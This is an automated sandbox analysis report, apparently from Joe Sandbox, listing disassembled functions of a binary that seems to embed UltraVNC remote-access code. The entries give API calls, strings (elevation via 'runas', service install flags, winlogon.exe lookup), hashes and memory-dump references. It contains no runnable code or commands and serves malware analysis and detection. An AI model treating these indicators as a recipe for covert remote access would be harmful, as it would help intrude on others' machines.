                                                                            • Opcode ID: ec94c065237d398f8d62b421f4d082ca1b1a587006caf467a8040e51e14df5ee
                                                                            • Instruction ID: 6aab0a4faf812e65133bfcc9651ed94b652701610e8d4c6b69101f1e2bcb43f3
                                                                            • Opcode Fuzzy Hash: ec94c065237d398f8d62b421f4d082ca1b1a587006caf467a8040e51e14df5ee
                                                                            • Instruction Fuzzy Hash: 8A417E21A08A8181EB909F24E8543A937A0EB85BAEF140335DFAE8B7D5DF7CD045C751
                                                                            Function 00007FF6C2BD3740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2C37BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF6C2BD3771), ref: 00007FF6C2C37BFE
                                                                            • GetLastError.KERNEL32 ref: 00007FF6C2BD3790
                                                                            • SetLastError.KERNEL32 ref: 00007FF6C2BD37B2
                                                                            • FormatMessageA.KERNEL32 ref: 00007FF6C2BD37EB
                                                                            • sprintf.LIBCMT ref: 00007FF6C2BD3804
                                                                              • Part of subcall function 00007FF6C2C3B240: _errno.LIBCMT ref: 00007FF6C2C3B258
                                                                              • Part of subcall function 00007FF6C2C3B240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C2C3B263
                                                                              • Part of subcall function 00007FF6C2BD3690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF6C2BD385F), ref: 00007FF6C2BD36A9
                                                                              • Part of subcall function 00007FF6C2BD3690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF6C2BD385F), ref: 00007FF6C2BD36D1
                                                                              • Part of subcall function 00007FF6C2BD3690: WriteConsoleA.KERNEL32 ref: 00007FF6C2BD36EE
                                                                              • Part of subcall function 00007FF6C2BD3690: WriteFile.KERNEL32(?,?,?,?,?,00007FF6C2BD385F), ref: 00007FF6C2BD3725
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
                                                                            • String ID: --$error code 0x%08X
                                                                            • API String ID: 1897734068-3878996968
                                                                            • Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                            • Instruction ID: 5b3a30745242a8955137dd7ddaa58d4c522f4583e6e0a66b503aa852b6bcf967
                                                                            • Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                            • Instruction Fuzzy Hash: 5331A076608A8281EB60CF21E4507AA6760FB85BADF544335EF9D877C9DF7DE0158B00
                                                                            Function 00007FF6C2B8ACB0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: freeinet_addrmalloc
                                                                            • String ID: 0123456789.$both$local$remote
                                                                            • API String ID: 2387382576-3366603569
                                                                            • Opcode ID: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
                                                                            • Instruction ID: d5d083eae4b0f9e56fe702e37ca92d70edd886374680073ed5b1b67607b8511b
                                                                            • Opcode Fuzzy Hash: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
                                                                            • Instruction Fuzzy Hash: F821A021A0C78241F7509F1199503B866A1FB897DAF589532DE9DCB7C5EEFCE9918300
                                                                            Function 00007FF6C2B97220 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileModuleNameShellfclose
                                                                            • String ID: \uvnckeyboardhelper.exe$p$runas
                                                                            • API String ID: 3322125093-2954907143
                                                                            • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                            • Instruction ID: 133d44601586d592b8796a11a6dce6900aaf49e8286247debb06164bcac8d22f
                                                                            • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                            • Instruction Fuzzy Hash: 1F31D835608B8285EAA09F10F4913AA73B4FB88759F804636DEDD83B99DF7CE115CB00
                                                                            Function 00007FF6C2B8A390 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: SHGetSettings$shell32.dll
                                                                            • API String ID: 145871493-1819508790
                                                                            • Opcode ID: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                                            • Instruction ID: 2c633d8ab70f0ac9ed43765003304e3c9c2d5f19c7c610ef2117e997cc11ce9b
                                                                            • Opcode Fuzzy Hash: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                                            • Instruction Fuzzy Hash: 1D116D21A09B4282EE90CF55B48417923A0EF89B8AF5C1436DF9E82755DFBCE4418340
                                                                            Function 00007FF6C2B97FB0 Relevance: 10.5, APIs: 7, Instructions: 46synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$ObjectResetSingleWait$CriticalEnterSection
                                                                            • String ID:
                                                                            • API String ID: 3343876880-0
                                                                            • Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                            • Instruction ID: a70c5a1708b626b20848c09fcc8b782b420e1485030d9ce178d7ffcc5227b8f8
                                                                            • Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                            • Instruction Fuzzy Hash: 91212F62A08A81D3EA989F22D5842AC7370FB85B9AF004171DF9E87750CF7CE4B4C740
                                                                            Function 00007FF6C2B919A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID: winlogon.exe
                                                                            • API String ID: 1789362936-961692650
                                                                            • Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                            • Instruction ID: ee6e598b5518088d48741a623e161e3d12456b41143f2f1fed90b19e7f346bd9
                                                                            • Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                            • Instruction Fuzzy Hash: C4118F31608A4681EB60DF25E8042A673B0FF8979EF444631DEAE87394DF7CD419C600
                                                                            Function 00007FF6C2BAC4E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists, xrefs: 00007FF6C2BAC557
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1, xrefs: 00007FF6C2BAC515
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeaveRevertSelfTimetime
                                                                            • String ID: vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists
                                                                            • API String ID: 4293870407-1873781047
                                                                            • Opcode ID: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                                            • Instruction ID: 93f0e2f1531546084345734b6ae9f957bbd8432801a4a7b57cf0c51f300eaa4b
                                                                            • Opcode Fuzzy Hash: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                                            • Instruction Fuzzy Hash: 89115A61A08A8285EB549F7494483B937A1AF49B8EF480032DA8E86392CFBDE065D345
                                                                            Function 00007FF6C2B899C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -startservice$p$runas
                                                                            • API String ID: 3648085421-278061118
                                                                            • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                            • Instruction ID: 772520dcc6b32d68bc00fb0a049229f3ffc266753c9a0ac1dd4c4167ad624c28
                                                                            • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                            • Instruction Fuzzy Hash: 2501C835619B8185E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            Function 00007FF6C2B89B20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -uninstall$p$runas
                                                                            • API String ID: 3648085421-3602422011
                                                                            • Opcode ID: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                                            • Instruction ID: e5f4fc6c54ea8def1a811b30e7392c0dc3f2672ba2f926f1cf201fedb6fc31c5
                                                                            • Opcode Fuzzy Hash: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                                            • Instruction Fuzzy Hash: CE01C835618B8185E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            Function 00007FF6C2B89A70 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -install$p$runas
                                                                            • API String ID: 3648085421-1683557327
                                                                            • Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                            • Instruction ID: c3b29e806ae95132bb04f3df564c08bb8ef16716038e354ca16ffa1d5be8eb98
                                                                            • Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                            • Instruction Fuzzy Hash: B901C835618B8185E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            Function 00007FF6C2B89910 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -stopservice$p$runas
                                                                            • API String ID: 3648085421-4230321595
                                                                            • Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                            • Instruction ID: c3d88afefa04ee0c08c19d1bf1f7f0afc3b98795be9f4e8613ed3ca39836b6c5
                                                                            • Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                            • Instruction Fuzzy Hash: B901C835618B81C5E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            Function 00007FF6C2BBBA00 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
